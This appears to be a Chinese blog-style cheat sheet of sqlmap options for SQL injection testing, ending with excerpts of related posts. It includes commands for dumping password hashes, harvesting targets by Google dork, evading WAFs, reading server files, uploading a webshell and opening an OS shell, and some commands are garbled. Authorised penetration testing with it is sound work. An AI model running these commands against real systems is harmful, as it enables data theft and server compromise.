sqlmap安裝
基本引數
-h 檢視幫助選項
--is-dba 當前使用者是否為管理員許可權
--dbs 所有資料庫
--current-db **當前資料庫
--users 所有資料庫使用者
--current-user 當前資料庫使用者
--tables 引數:列表名
--columns 引數:列欄位
--dump-all 轉存dbms資料庫所有表專案
--level 測試等級(1-5),預設為1
讀取資料庫--->讀取表---->讀取表的列---->獲取內容
-d 指定資料庫
-t 指定表
-c 指定列
--dbms=mysql、oracle、mssql 指定資料庫
--passwords 列舉所有使用者密碼
--roles 列出資料庫管理員角色(當前資料庫許可權)
--privileges 列出資料庫管理員許可權
sqlmap.py -u "" --schema --batch --exclude-sysdbs
--schema 列系統框架(很漫長,慎用!)
--batch 預設yes
--exclude-sysdbs 排除系統自帶的資料庫
- -level 探測等級
–risk 風險等級
-u或者-url 獲取目標引數
-m 從文字中獲取多個目標掃瞄
www.target1.com/vuln1.php?q=foobar
……
執行如下,命令sqlmap會逐個檢測url
sqlmap.py -m c:\a.txt
-r 獲取http請求注入
-g 處理google搜尋結果
python sqlmap.py -g "inurl:php?id="
–referer,–headers,–proxy,sqlmap.py -u "" --referer=""
sqlmap.py -u "" --hearders 「client-ip:1.1.1.1」
sqlmap.py -u "" --proxy ""
–delay、–timeout、–retries時間控制(降低爬行速度,過狗。或修改sqlmap的爬行蜘蛛)
–safe-url,–safe-freq
-p 手動指定要測試的位置
sqlmap.py -r d:\1.txt -p uname,passwd
–data 此引數是把資料以post方式提交,sqlmap會像檢測get引數一樣檢測post的引數。python sqlmap.py -r d:\1.txt --data="id=1"
–param-del 引數拆分字元python sqlmap.py -u "" --data="query=foobar;id=1" --param-del=";"
–cookie 適用於cookie注入
將參加加入cookie注入測試,例如:
sqlmap -u "" --cookie "id=9" --table --level 2
–prefix,–suffix【閉合前面—prefix="』)
「閉合後面—suffix=」』)
"】$query = "select * from users where id=(』" . $_get[』id』] . "』) limit 0, 1";
sqlmap.py -u "" -p id --prefix "』)" --suffix "and(』abc』=』abc"
–union-cols
–union-char
–second-order
–dump-all,–exclude-sysdbs
–search,-c,-t,-d
–udf-inject,–shared-lib
–batch
–charset
–flush-session
–hex
sqlmap.py -u "" --banner --hex -v 3 --parse-errors
-s,-t
–output-dir
–parse-errors 從響應中獲取dbms的錯誤資訊。
–smart
python sqlmap.py -u "" --batch --smart
–mobilesqlmap.py -u "" --mobile
–identify-waf,–check-wafsqlmap.py -u --identify-waf -v 3
登錄檔操作(慎用!!!操作不當,系統易崩潰。)python sqlmap.py -u --reg-add --reg-key="hkey_local_machine\software\sqlmap" --reg-value=test --reg-type=reg_sz --reg-data=1
–common-tables 暴力破解表名
–common-columns 暴力破解列名
post登入框注入
搜尋框注入
偽靜態注入
sqlmap -u #其中*意為指定的注入點
base64編碼注入sqlmap -u --tamper base64encode.py –dbs
請求時間延遲
檔案讀寫
sqlmap.py -u "" --file-read="c:/inetpub/wwwroot/mysql-php/1.php"
–file-write,–file-dest檔案上傳(可上傳一句話)
–os-cmd,–os-shell命令執行
–dump
waf繞過注入
sqlmap -u -v 3 --dbs --batch --tamper "space2morehash.py"
還有:space2hash.py
base64encode.py
charencode.py
sqlmap -u "" --os-pwn --msf-th /usr/share/metasploit-framework/
Sqlmap 使用方法小結
平常的使用get方法像 tables columns t d dbs dump 啥的就不說了,只是部落格幾天不發,空著不好,還是得寫寫東西 is dba 當前使用者許可權 是否為root許可權,mssql下最高許可權為sa dbs 所有資料庫 current db 當前資料庫 users 所有資料庫...
sqlmap基本使用方法
sqlmap是安全測試工具,通常用於對已知的http介面進行sql注入測試,一旦注入成功,可以獲取到後台包括資料庫表 使用者資訊 資料內容等多種敏感資訊,對web漏洞防範有重要意義。基本語法 1.先進行注入點探測,常規語法是 python sqlmap.py u url 說明 url 一般選擇包括引...
sqlmap的簡要使用方法
僅作為備忘!sqlmap使用 注入型別有四種分別為 boolean based blind error based stacked queries inline query。sqlmap u u 注入點 檢測注入點是否可用 sqlmap u dbs 可曝出該sqlserver中所有資料庫名稱 sql...